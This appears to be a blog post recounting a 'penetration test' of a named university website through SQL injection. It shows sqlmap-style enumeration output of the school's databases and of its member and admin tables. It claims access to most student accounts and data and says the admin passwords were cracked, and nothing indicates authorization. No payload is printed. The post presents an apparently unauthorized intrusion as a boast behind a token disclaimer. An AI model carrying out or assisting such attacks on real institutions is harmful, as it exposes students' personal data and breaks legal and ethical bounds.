Penetration Test of Orlando University

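All content on this site is original; some content is reposted with the original author's permission.
This time, straight to the target: http://www.orlandouniversity.com/
Disclaimer: the following article is for technical research and learning reference only; this site bears no legal responsibility for anything arising from its content!
Strong contempt for the copy-paste crowd who plagiarize articles.
The vulnerability was very obvious: a direct SQL injection, which gave access to 90% of the school's accounts and student data. The subsequent intranet penetration is not covered in detail in this article.
Two databases were detected [2]: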
[*] information_schema
[*] orlandoedu
Database: orlandoedu
[195 tables]
Database: orlandoedu
Table: uc_members
[12 columns]
Database: orlandoedu
Table: uc_members
[2 entries]
Database: orlandoedu
Table: cdb_access
[9 columns]
Database: orlandoedu
Table: cdb_members
[23 columns]
Database: orlandoedu
Table: cdb_members
[2 entries]
Database: orlandoedu
Table: uc_admins
[14 columns]
Database: orlandoedu
Table: mp_members
[38 columns]
Database: orlandoedu
Table: mp_members
[9 entries]
The administrator account passwords had already been cracked at this point; I hope nobody uses them to do harm.